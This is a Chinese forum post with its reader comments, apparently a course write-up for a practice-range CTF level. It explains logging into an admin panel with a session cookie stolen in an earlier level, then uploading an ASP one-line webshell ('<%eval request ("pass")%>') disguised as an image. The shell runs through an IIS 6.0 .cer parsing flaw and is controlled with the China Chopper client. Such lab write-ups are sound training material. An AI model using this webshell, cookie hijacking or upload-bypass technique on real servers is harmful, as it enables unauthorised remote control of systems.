靶场第五关解题思路--Get Shell! — 绕过防护上传木马

Track-聂风   ·   发表于 2018-5-18   ·   CTF&WP专版

PPT、课件已打包至附件! 

直播回放观看:https://ke.qq.com/webcourse/index.html#course_id=275794&term_id=100326238&taid=2183187711407442&vid=f1425nhgbnh


看了题目和Tips,这题是需要我们用上一题窃取的cookie来登录后台然后上传WEBSHELL,然后连接菜刀获取flag。


先找到上一题打来的cookie。


ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC


然后按F12选择Application,然后看右边有一个cookies然后选择我们的题目的地址,然后点击空白的地方,


把ADMINSESSIONIDCSTRCSDQ粘贴在Name下LBMLMBCCNPFINOANFGLPCFBC粘贴在value


(浏览器可能会有差异,我是谷歌浏览器,不懂可以百度下非常简单)


然后点准备好了吗或者F5刷新页面,成功进入

然后我们直接找上传点,毕竟getshell我们是需要在服务器的WWW文件夹里面放一段恶意代码的。


我们先去百度找ASP一句话木马,因为是ASP的环境


ASP一句话木马:<%eval request ("pass")%> 密码是pass eval是个函数,request是接受参数的。有兴趣了解一句话的可以自行百度或者私聊我。


一般而言直接传木马文件都很可能被拦截,所以一般而言一句话木马都会做成图片马。图片马制作非常简单,一条CMD命令就可以了


具体的可以去http://bbs.zkaq.cn/?t/159.html 查看 然后我们成功的得到了图片马


找到上传点

我们修改产品管理里面的产品

文件存在然后上菜刀。菜刀打开右键添加,地址就写文件地址,边上的框框写密码,我的就是pass,记得选择脚本格式


然后我们双击去访问,丢了一个405报错。这是因为jpg文件不解析,因为你的后缀是图片格式,所以服务器会当做一张图片去读取,而不是代码。


就和你把一个图片后缀改为TXT然后打开里面的东西都会当文本读取而不是图片。


报错信息里面写了iis6.0的中间件。百度下iis6.0的解析漏洞,就能发现上传cer文件,iis6.0会解且执行。


然后把图片马名字改为cer上传,成功上传,然后菜刀连接,成功进入,然后滚轮划一下就能看到flag!.txt,然后双击打开就是flag了。






打赏我,让我更有动力~

23 Reply   |  Until 8天前 | 14791 View

tcf
发表于 2018-5-20


评论列表

  • 加载数据中...

编写评论内容

mask
发表于 2018-5-30

无论怎么改都是405错误....很奇怪

评论列表

  • 加载数据中...

编写评论内容

飞羽ceo
发表于 2018-6-4

楼主可以分享下工具吗

评论列表

  • 加载数据中...

编写评论内容

zzz
发表于 2018-6-17

老师cer编译器错误

评论列表

  • 加载数据中...

编写评论内容

824097878
发表于 2018-7-14

405错误怎么办

评论列表

  • 加载数据中...

编写评论内容

tnt3t34
发表于 2018-8-2

没有菜刀怎么办,自己整个板砖?

评论列表

  • 加载数据中...

编写评论内容

poppy
发表于 2018-8-2

这是什么问题????????

评论列表

  • 加载数据中...

编写评论内容

qsc19995
发表于 2018-9-16

这是什么问题啊老师


评论列表

  • 加载数据中...

编写评论内容

black
发表于 2018-10-22

我想问下,为什么我用火狐浏览器,用burp来修改cookie,怎么一直登不上后台?

评论列表

  • 加载数据中...

编写评论内容

denlu026
发表于 2019-1-2

flag.txt提示没有权限,什么情况


评论列表

  • 加载数据中...

编写评论内容

小尘
发表于 2019-1-4

png和TXT文件怎么改在菜刀上都用不起

评论列表

  • 加载数据中...

编写评论内容

一止
发表于 2019-2-9

菜刀哪里有啊


评论列表

  • 加载数据中...

编写评论内容

orang_boy
发表于 2019-2-18

附件在哪

评论列表

  • 加载数据中...

编写评论内容

豆瓣酱
发表于 2019-4-1

1.上传的0.cer文件的内容

2.上传成功后查看在服务器文件的内容,发现上传的cer文件中的一句话木马没了,不知道是变成乱码还是服务器过滤了。

3.添加完毕后 有-1值,连接时,无法连接。   过段时间-1值消失 连接还是无法连接。


以为是菜刀被杀了,关了360在社区重新下载,再次尝试,发现还是不行。希望老师们在百忙之中抽出一点时间解答一下。万分感谢哈



评论列表

  • 加载数据中...

编写评论内容

gin
发表于 2019-5-10

为什么我的cookie改了之后刷新没有反应啊,我也是谷歌

评论列表

  • 加载数据中...

编写评论内容

undefined_object
发表于 2019-5-20

为嘛是flag错误?求解答

评论列表

  • 加载数据中...

编写评论内容

般若
发表于 2019-8-22

查出的flag是错误的?

评论列表

  • 加载数据中...

编写评论内容

rare
发表于 2019-9-25

内容为空,flag错误。

评论列表

  • 加载数据中...

编写评论内容

mxh81862469
发表于 8个月前

评论列表

  • 加载数据中...

编写评论内容

phant0m
发表于 6个月前

评论列表

  • 加载数据中...

编写评论内容
1 2 / 2 跳转 尾页
LoginCan Publish Content
返回顶部

掌控者 © 2016. All Rights Reserved. 掌控者

Powered by 掌控者 Version 2.1.3